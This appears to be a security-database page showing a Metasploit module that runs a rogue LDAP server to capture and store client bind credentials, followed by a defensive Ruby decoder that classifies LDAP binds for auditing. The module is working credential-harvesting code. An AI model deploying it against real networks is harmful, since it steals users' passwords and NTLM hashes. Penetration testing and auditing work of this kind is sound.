Authentication Capture: LDAP

Reported: 16 Feb 2024 19:51:07
Reported by: JustAnda7
Type: metasploit
Source: www.rapid7.com

Capture LDAP authentication information

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::LDAP::Server

  def initialize(_info = {})
    super(
      'Name' => 'Authentication Capture: LDAP',
      'Description' => %q{
        This module mocks an LDAP service to capture authentication
        information of a client trying to authenticate against an LDAP service
      },
      'Author' => 'JustAnda7',
      'License' => MSF_LICENSE,
      'Actions' => [
        [ 'Capture', { 'Description' => 'Run an LDAP capture server' } ]
      ],
      'PassiveActions' => [ 'Capture' ],
      'DefaultAction' => 'Capture',
      'Notes' => {
        'Stability' => [],
        'Reliability' => [],
        'SideEffects' => []
      }
    )

    register_options(
      [
        OptAddress.new('SRVHOST', [ true, 'The ip address to listen on.', '0.0.0.0' ]),
        OptPort.new('SRVPORT', [ true, 'The port to listen on.', '389' ]),
        # NTLM server challenge; the check in #run enforces exactly 16 alphanumeric characters
        OptString.new('CHALLENGE', [ true, 'The 8 byte challenge', Rex::Text.rand_text_alphanumeric(16) ])
      ]
    )

    # Drop the mixin's LDIF_FILE option so it can be re-registered below as optional
    deregister_options('LDIF_FILE')

    register_advanced_options(
      [
        OptString.new('Domain', [ false, 'The default domain to use for NTLM authentication', 'DOMAIN']),
        OptString.new('Server', [ false, 'The default server to use for NTLM authentication', 'SERVER']),
        OptString.new('DnsName', [ false, 'The default DNS server name to use for NTLM authentication', 'SERVER']),
        OptString.new('DnsDomain', [ false, 'The default DNS domain name to use for NTLM authentication', 'example.com']),
        OptPath.new('LDIF_FILE', [ false, 'Directory LDIF file path'])
      ]
    )
  end

  def run
    # Refuse to start unless CHALLENGE is exactly 16 alphanumeric characters
    unless datastore['CHALLENGE'].to_s =~ /^([a-zA-Z0-9]{16})$/
      print_error('CHALLENGE syntax must match 1122334455667788')
      return
    end
    exploit # start the LDAP server provided by the mixin
  end

  # Called once the server is listening: hook every BindRequest the mixin processes
  def primer
    service.processed_pdu_handler(Net::LDAP::PDU::BindRequest) do |processed_data|
      # :post_pdu is set once the mixin has finished handling the bind
      if processed_data[:post_pdu]
        if processed_data[:error_msg]
          print_error(processed_data[:error_msg])
        else
          print_good(processed_data[:result_message])
          report_cred(processed_data)
        end
      end
    end
  end

  # Store the captured credential in the database, linked to the client's service
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:private],
      private_type: opts[:private_type]
    }.merge(service_data)

    # Attach the AD domain as the credential realm when the bind supplied one
    if opts[:domain]
      credential_data = {
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: opts[:domain]
      }.merge(credential_data)
    end

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end
end
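The `primer` hook above receives every BindRequest the server sees. As an added audit example (not part of this module or of Metasploit), the decoder below parses the same BindRequest PDU from raw bytes and classifies the bind: a simple bind puts the password on the wire in cleartext, a SASL bind exposes only a mechanism token such as NTLM. Run over traffic captured on port 389 it shows which clients would hand a rogue server usable credentials. The helper names (`tlv`, `ber_tlv`, `classify_bind`) and the two sample PDUs are mine; only short-form BER lengths are handled.

```ruby
# Constructed-input helper: one short-form BER TLV (length < 128)
def tlv(tag, value)
  [tag, value.bytesize].pack('CC') + value
end

# Read the TLV at offset `off`; returns [tag, value_bytes, offset_after]
def ber_tlv(buf, off)
  tag = buf.getbyte(off)
  len = buf.getbyte(off + 1)
  raise 'long-form BER length not supported' if len.nil? || len >= 0x80
  [tag, buf.byteslice(off + 2, len), off + 2 + len]
end

# Classify an LDAPMessage. Returns nil unless it is a BindRequest; otherwise a
# hash with the DN, authentication choice and risk. The password itself is never
# returned, only its length, so the audit log does not become a second leak.
def classify_bind(pdu)
  tag, body, = ber_tlv(pdu, 0)
  return nil unless tag == 0x30                         # LDAPMessage SEQUENCE
  id_tag, id_bytes, off = ber_tlv(body, 0)
  return nil unless id_tag == 0x02                      # messageID INTEGER
  op_tag, op, = ber_tlv(body, off)
  return nil unless op_tag == 0x60                      # [APPLICATION 0] BindRequest
  _, ver, off = ber_tlv(op, 0)                          # version INTEGER
  _, name, off = ber_tlv(op, off)                       # name LDAPDN (OCTET STRING)
  auth_tag, auth, = ber_tlv(op, off)                    # authentication CHOICE
  info = { message_id: id_bytes.bytes.inject(0) { |n, b| (n << 8) | b },
           version: ver.getbyte(0), name: name }
  case auth_tag
  when 0x80 # simple [0]: the password crosses the wire in cleartext
    info.merge(auth: :simple, cleartext_password_len: auth.bytesize, risk: :high)
  when 0xA3 # sasl [3]: mechanism name plus an opaque token (e.g. NTLM inside GSS-SPNEGO)
    _, mech, = ber_tlv(auth, 0)
    info.merge(auth: :sasl, mechanism: mech, risk: :medium)
  else
    info.merge(auth: :unknown, risk: :unknown)
  end
end

# Constructed sample PDUs (not captured traffic): a simple bind and a SASL bind
SIMPLE_BIND = tlv(0x30, tlv(0x02, "\x01") +
  tlv(0x60, tlv(0x02, "\x03") + tlv(0x04, 'cn=admin,dc=example,dc=com') + tlv(0x80, 'secret')))
SASL_BIND = tlv(0x30, tlv(0x02, "\x02") +
  tlv(0x60, tlv(0x02, "\x03") + tlv(0x04, '') +
    tlv(0xA3, tlv(0x04, 'GSS-SPNEGO') + tlv(0x04, "NTLMSSP\x00"))))

[SIMPLE_BIND, SASL_BIND].each { |pdu| puts classify_bind(pdu).inspect }
```

Any `:simple` hit on a plaintext port 389 session is a client that should be moved to LDAPS or StartTLS; `:sasl` hits with an NTLM token are where LDAP signing and channel binding apply.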
